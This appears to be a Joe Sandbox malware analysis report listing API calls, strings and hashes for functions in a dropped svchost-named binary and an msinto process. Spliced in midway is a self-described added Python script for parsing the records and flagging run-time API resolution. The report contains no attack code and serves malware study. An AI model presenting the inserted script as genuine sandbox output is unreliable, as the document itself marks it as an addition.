                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: f278501887b94b1a579cac15796f1fe070a032aa9681ddbd5b53625845fa2a26
                                                            • Instruction ID: f171344bcc2503068d92a832d4503b61fb5a8b92e23559ca8305b5aca6e4867d
                                                            • Opcode Fuzzy Hash: f278501887b94b1a579cac15796f1fe070a032aa9681ddbd5b53625845fa2a26
                                                            • Instruction Fuzzy Hash: 5831E172A0021AAFDF26CF68CC41DAE7BA5FB01311B054228FC04E7251EB35DD58CB91
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 0084A666
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0084A675
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0084A683
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0084A691
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 052329a18defa9782dc4b76e2881ccb259b602fe3ea1ab10b29c10fda90f906d
                                                            • Instruction ID: 9de4e000d7a16c6d18fbfc76e197220fd59b0736f944d587c64e330d1f85512b
                                                            • Opcode Fuzzy Hash: 052329a18defa9782dc4b76e2881ccb259b602fe3ea1ab10b29c10fda90f906d
                                                            • Instruction Fuzzy Hash: 3BE01D31982F21F7D3516B607C0DB8B3E54FB15B52F050112F609A51D4DB74C5408BD5
                                                            APIs
                                                              • Part of subcall function 0084A699: GetDC.USER32(00000000), ref: 0084A69D
                                                              • Part of subcall function 0084A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0084A6A8
                                                              • Part of subcall function 0084A699: ReleaseDC.USER32(00000000,00000000), ref: 0084A6B3
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 0084A83C
                                                              • Part of subcall function 0084AAC9: GetDC.USER32(00000000), ref: 0084AAD2
                                                              • Part of subcall function 0084AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0084AB01
                                                              • Part of subcall function 0084AAC9: ReleaseDC.USER32(00000000,?), ref: 0084AB99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ObjectRelease$CapsDevice
                                                            • String ID: (
                                                            • API String ID: 1061551593-3887548279
                                                            • Opcode ID: 2438004a909be2f5f60be7942f4691265516dd8f43096c10645e17fc998ce395
                                                            • Instruction ID: 6d5044c3765ba300b3352ba368c196cbbba07792071ad803d62b380d0eeba06c
                                                            • Opcode Fuzzy Hash: 2438004a909be2f5f60be7942f4691265516dd8f43096c10645e17fc998ce395
                                                            • Instruction Fuzzy Hash: C891F071208359AFD624DF25C848A2BBBF9FFC8701F00491EF59AD7220DB70A905CB62
                                                            APIs
                                                            • _free.LIBCMT ref: 0085B324
                                                              • Part of subcall function 00859097: IsProcessorFeaturePresent.KERNEL32(00000017,00859086,00000050,00863A34,?,0083D710,00000004,00871030,?,?,00859093,00000000,00000000,00000000,00000000,00000000), ref: 00859099
                                                              • Part of subcall function 00859097: GetCurrentProcess.KERNEL32(C0000417,00863A34,00000050,00871030), ref: 008590BB
                                                              • Part of subcall function 00859097: TerminateProcess.KERNEL32(00000000), ref: 008590C2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                            • String ID: *?$.
                                                            • API String ID: 2667617558-3972193922
                                                            • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                            • Instruction ID: ac0cb9dc57848a04b3ef41d92298aba9f3ac953aac110b675bdc2930916c8204
                                                            • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                            • Instruction Fuzzy Hash: 2B518F71E0020AEFDF14DFA8C881AADBBF5FF68315F248169E854E7341E7359A098B50
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 008375E3
                                                              • Part of subcall function 008405DA: _wcslen.LIBCMT ref: 008405E0
                                                              • Part of subcall function 0083A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0083A598
                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0083777F
                                                              • Part of subcall function 0083A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0083A325,?,?,?,0083A175,?,00000001,00000000,?,?), ref: 0083A501
                                                              • Part of subcall function 0083A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0083A325,?,?,?,0083A175,?,00000001,00000000,?,?), ref: 0083A532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                            • String ID: :
                                                            • API String ID: 3226429890-336475711
                                                            • Opcode ID: 213411966f5151ad567054d4e47e3e09e859620ef99c19aae2f52228ee05053d
                                                            • Instruction ID: dc307c3ff0cc25a2374ae4a3fc33cc6ee87e7b29b60d543525ea7bd6840f75e8
                                                            • Opcode Fuzzy Hash: 213411966f5151ad567054d4e47e3e09e859620ef99c19aae2f52228ee05053d
                                                            • Instruction Fuzzy Hash: A84156B1801558A9EB35EB58CC56EDEB77CFF95300F004096B645E2092DB749F85CFA1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: }
                                                            • API String ID: 176396367-4239843852
                                                            • Opcode ID: c8595a49a435d4f4947896573c214e0290b07a9daf59171bd368eb32abb874c8
                                                            • Instruction ID: c6ec6a40a2a8b8e7da7a0f6ed7826022251560691fdaf39949bab170559484af
                                                            • Opcode Fuzzy Hash: c8595a49a435d4f4947896573c214e0290b07a9daf59171bd368eb32abb874c8
                                                            • Instruction Fuzzy Hash: 0121AE7290431E5AD731EAA8D845E6AF3ECFFA1751F05042AFA40C3241EB65DD4883A3
                                                            APIs
                                                              • Part of subcall function 0083F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0083F2E4
                                                              • Part of subcall function 0083F2C5: GetProcAddress.KERNEL32(008781C8,CryptUnprotectMemory), ref: 0083F2F4
                                                            • GetCurrentProcessId.KERNEL32(?,?,?,0083F33E), ref: 0083F3D2
                                                            Strings
                                                            • CryptUnprotectMemory failed, xrefs: 0083F3CA
                                                            • CryptProtectMemory failed, xrefs: 0083F389
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CurrentProcess
                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                            • API String ID: 2190909847-396321323
                                                            • Opcode ID: 779556a0f2c07cf1c6c29c809560572240c78fa1c4ea181c67c85b1fda8b306f
                                                            • Instruction ID: 48601966a744d0d1520d65dc10ee0ecee85225f2c2c04d0aa0521fa3d74fca82
                                                            • Opcode Fuzzy Hash: 779556a0f2c07cf1c6c29c809560572240c78fa1c4ea181c67c85b1fda8b306f
                                                            • Instruction Fuzzy Hash: BA112631E04629ABDF119F28DC49A6E3B54FF80760F118126FE05DB352DB75DD418AE1
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 0083B9B8
                                                              • Part of subcall function 00834092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008340A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf
                                                            • String ID: %c:\
                                                            • API String ID: 1543624204-3142399695
                                                            • Opcode ID: 5bf6a4863579f249b889eeae0ece4940146a124761e9d2d194f0bbc56995ef01
                                                            • Instruction ID: 9985dc98b768390d603b3397974fb4aa730bde12b3dd7d7bb2dd9ab3fa232952
                                                            • Opcode Fuzzy Hash: 5bf6a4863579f249b889eeae0ece4940146a124761e9d2d194f0bbc56995ef01
                                                            • Instruction Fuzzy Hash: 9301F9A35047117596706B798C42D6BBB9CFFD2771F40480AFA44D7082FB24D85482F2
                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,00010000,00841160,?,00000000,00000000), ref: 00841043
                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 0084108A
                                                              • Part of subcall function 00836C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00836C54
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Thread$CreatePriority__vswprintf_c_l
                                                            • String ID: CreateThread failed
                                                            • API String ID: 2655393344-3849766595
                                                            • Opcode ID: 59add5815b3132101e057256cc6997c40d7b92f4f04bae7c5dbd9f70ea2738ea
                                                            • Instruction ID: 64a1cd8a6e51dc5351010e29710cd22528f5f5ea86f5869e4a8afb66235dba9d
                                                            • Opcode Fuzzy Hash: 59add5815b3132101e057256cc6997c40d7b92f4f04bae7c5dbd9f70ea2738ea
                                                            • Instruction Fuzzy Hash: C0012BB534070D7BDB305F6C9C4AB767358FB50751F20002EF646D2280CBA1A8C54221
                                                            APIs
                                                              • Part of subcall function 0083E2E8: _swprintf.LIBCMT ref: 0083E30E
                                                              • Part of subcall function 0083E2E8: _strlen.LIBCMT ref: 0083E32F
                                                              • Part of subcall function 0083E2E8: SetDlgItemTextW.USER32(?,0086E274,?), ref: 0083E38F
                                                              • Part of subcall function 0083E2E8: GetWindowRect.USER32(?,?), ref: 0083E3C9
                                                              • Part of subcall function 0083E2E8: GetClientRect.USER32(?,?), ref: 0083E3D5
                                                            • GetDlgItem.USER32(00000000,00003021), ref: 0083135A
                                                            • SetWindowTextW.USER32(00000000,008635F4), ref: 00831370
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                            • String ID: 0
                                                            • API String ID: 2622349952-4108050209
                                                            • Opcode ID: dada6cc0488eea4dd6472ac03be233be1c54210ec89dccf8a02fa82172c68359
                                                            • Instruction ID: 35861bae6d78328d707425af737ac94e8065d0bed165a7723d69a87edeb2214c
                                                            • Opcode Fuzzy Hash: dada6cc0488eea4dd6472ac03be233be1c54210ec89dccf8a02fa82172c68359
                                                            • Instruction Fuzzy Hash: E0F03C30104288AADF151F65C80DAEA3B59FF84748F088219FD49D5AA1CB78CA98AB90
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00841206,?), ref: 00840FEA
                                                            • GetLastError.KERNEL32(?), ref: 00840FF6
                                                              • Part of subcall function 00836C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00836C54
                                                            Strings
                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00840FFF
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                            • API String ID: 1091760877-2248577382
                                                            • Opcode ID: 0e7e014fd5c37389d03be6ed8de8f407874c4294d6192f7b060ce819a1ce7185
                                                            • Instruction ID: df85a440c64fa8d60abfd425b7b880113d69574080a9e3bb741b4c7605ebf49e
                                                            • Opcode Fuzzy Hash: 0e7e014fd5c37389d03be6ed8de8f407874c4294d6192f7b060ce819a1ce7185
                                                            • Instruction Fuzzy Hash: 5FD02E725089217ACE10332CAC0AC6F3C04FB62331F22A704F138E03E6CB2949A662D3
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,0083DA55,?), ref: 0083E2A3
                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0083DA55,?), ref: 0083E2B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: FindHandleModuleResource
                                                            • String ID: RTL
                                                            • API String ID: 3537982541-834975271
                                                            • Opcode ID: aca9f40f8e0f3da92ee715df37c57037b0ced07011d32d61b8eb73c5a243b4dc
                                                            • Instruction ID: c324250b63558cf32f042cb83ce4400b2b8b3f8c4e0b268fb3dc02f3c888025b
                                                            • Opcode Fuzzy Hash: aca9f40f8e0f3da92ee715df37c57037b0ced07011d32d61b8eb73c5a243b4dc
                                                            • Instruction Fuzzy Hash: 1CC01231241B2066EA3027A46C0DB836A98BB00B16F0A1448F281EE2D1DAF9C98886E1
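The function records above follow one fixed layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity, each field on a bulleted line), so they can be parsed rather than read one by one. The Python script below is an added example and is not part of the Joe Sandbox report or its tooling. It parses records in that layout, takes the process number from the dump file name and the image name from the snapshot file name (an assumption: the leading field of the `.sdmp` name and the number in `hcaresult_<process>_<run>_<base>_<image>.jbxd` agree in every record on this page), and flags functions that look up API names through GetProcAddress, as the record above with the CryptProtectMemory and CryptUnprotectMemory strings does. The embedded sample is two records copied from this page, trimmed to the lines the parser uses.

```python
"""Parse Joe Sandbox per-function records and flag run-time API resolution. Added example."""
from __future__ import annotations
import re
from collections import namedtuple
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two records copied from this report (process 2, the dropped
# svchost-named binary), trimmed to the lines the parser consumes.
SAMPLE = """\
APIs
  • Part of subcall function 0083F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0083F2E4
  • Part of subcall function 0083F2C5: GetProcAddress.KERNEL32(008781C8,CryptUnprotectMemory), ref: 0083F2F4
• GetCurrentProcessId.KERNEL32(?,?,?,0083F33E), ref: 0083F3D2
Strings
• CryptUnprotectMemory failed, xrefs: 0083F3CA
• CryptProtectMemory failed, xrefs: 0083F389
Memory Dump Source
• Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_830000_svchost.jbxd
Similarity
• Opcode ID: 779556a0f2c07cf1c6c29c809560572240c78fa1c4ea181c67c85b1fda8b306f
• Instruction Fuzzy Hash: BA112631E04629ABDF119F28DC49A6E3B54FF80760F118126FE05DB352DB75DD418AE1
APIs
• CreateThread.KERNEL32(00000000,00010000,00841160,?,00000000,00000000), ref: 00841043
• SetThreadPriority.KERNEL32(?,00000000), ref: 0084108A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_830000_svchost.jbxd
Similarity
• Opcode ID: 59add5815b3132101e057256cc6997c40d7b92f4f04bae7c5dbd9f70ea2738ea
• Instruction Fuzzy Hash: C0012BB534070D7BDB305F6C9C4AB767358FB50751F20002EF646D2280CBA1A8C54221
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• Name.MODULE(args), ref: ADDR", optionally prefixed by the subcall note; CRT entries like "• _swprintf.LIBCMT ref: ADDR" have no argument list.
API_RE = re.compile(r"^• (?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?(?P<name>\w+)\.(?P<mod>\w+)"
                    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
STR_RE = re.compile(r"^• (?P<text>.+), xrefs: (?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^• (?P<key>[^:]+): ?(?P<val>.*)$")
# Assumption: the leading field of the dump name is the process number, the same one
# embedded in the snapshot name (the two agree in every record on this page).
DUMP_RE = re.compile(r"^(?P<proc>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\.[0-9A-Fa-f]{16}\.")
SNAP_RE = re.compile(r"^hcaresult_(?P<proc>\d+)_\d+_[0-9A-Fa-f]+_(?P<image>.+)\.jbxd$")

ApiCall = namedtuple("ApiCall", "name module args ref via_subcall")  # via_subcall: callee address when indirect

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, str]] = field(default_factory=list)  # (text, xref)
    meta: dict[str, str] = field(default_factory=dict)  # every other "• Key: value" line

def parse_records(text: str) -> list[FunctionRecord]:
    """Split the listing into records; the 'Instruction Fuzzy Hash' line closes each one."""
    records: list[FunctionRecord] = []
    cur, section = FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
        elif section == "APIs" and (m := API_RE.match(line)):
            cur.apis.append(ApiCall(m["name"], m["mod"], m["args"] or "", m["ref"], m["sub"]))
        elif section == "Strings" and (m := STR_RE.match(line)):
            cur.strings.append((m["text"], m["ref"]))
        elif (m := KV_RE.match(line)):
            cur.meta[m["key"]] = m["val"].strip()
            if m["key"] == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FunctionRecord()
    return records

def locate(rec: FunctionRecord) -> tuple[Optional[int], Optional[str]]:
    """(process number, image name) taken from the dump and snapshot file names."""
    d = DUMP_RE.match(rec.meta.get("Source File", ""))
    s = SNAP_RE.match(rec.meta.get("Snapshot File", ""))
    return (int(d["proc"], 16) if d else None), (s["image"] if s else None)

def dynamically_resolved(rec: FunctionRecord) -> set[str]:
    """API names passed to GetProcAddress: dependencies the import table does not show."""
    names: set[str] = set()
    for call in rec.apis:
        target = call.args.rsplit(",", 1)[-1].strip()
        if call.name == "GetProcAddress" and target and not re.fullmatch(r"[0-9A-Fa-f]+|\?", target):
            names.add(target)  # a symbolic name, not an address or an unresolved '?'
    return names

def summarize(records: list[FunctionRecord]) -> list[dict]:
    """One triage row per function; rows that resolve APIs by name sort first."""
    rows = []
    for r in records:
        proc, image = locate(r)
        rows.append({"process": proc, "image": image, "apis": sorted({c.name for c in r.apis}),
                     "strings": [s for s, _ in r.strings],
                     "resolved_at_runtime": sorted(dynamically_resolved(r)),
                     "opcode_id": r.meta.get("Opcode ID", "")})
    return sorted(rows, key=lambda row: (not row["resolved_at_runtime"], row["opcode_id"]))
```

Run it over a plain-text copy of the report's function listing and `summarize` puts the functions that fetch APIs by name at the top. On this page that is the svchost-named drop's function that looks up CryptProtectMemory and CryptUnprotectMemory through GetProcAddress; that dependency is invisible to a static look at the file's import table, which is why it is worth triaging ahead of the CreateThread, dialog and string-formatting plumbing in the other records.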

                                                            Execution Graph

                                                            Execution Coverage:10.4%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:3
                                                            Total number of Limit Nodes:0
                                                            execution_graph
                                                            • Node 7108: 7ffd34c9cac1
                                                            • Node 7110: 7ffd34c9cb36 QueryFullProcessImageNameA
                                                            • Node 7111: 7ffd34c9cc84
                                                            • Edges: 7108 -> 7110 -> 7111

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5Z_H
                                                            • API String ID: 0-3267294416
                                                            • Opcode ID: 9572d492c200d6634ae14549340cb217e995b387b890a74857aeb6457210ffcb
                                                            • Instruction ID: 74d00bc151e67a06939f42eb6816cc1ad7103d9d442703793e13af4343590428
                                                            • Opcode Fuzzy Hash: 9572d492c200d6634ae14549340cb217e995b387b890a74857aeb6457210ffcb
                                                            • Instruction Fuzzy Hash: 2891D065A09A894FE799DF6888753E9BFF1FF56310F0401BEC149E72D6CAB92811C350

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2409179094.00007FFD34C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd34c90000_msinto.jbxd
                                                            Similarity
                                                            • API ID: FullImageNameProcessQuery
                                                            • String ID:
                                                            • API String ID: 3578328331-0
                                                            • Opcode ID: 103354322dddd460682f9f5e7577515848546292b5d036cab94208bd339dc20b
                                                            • Instruction ID: 64bd7fd9b035d26b2c45f28757b0bc37971134f9178bc1be76d83717420548be
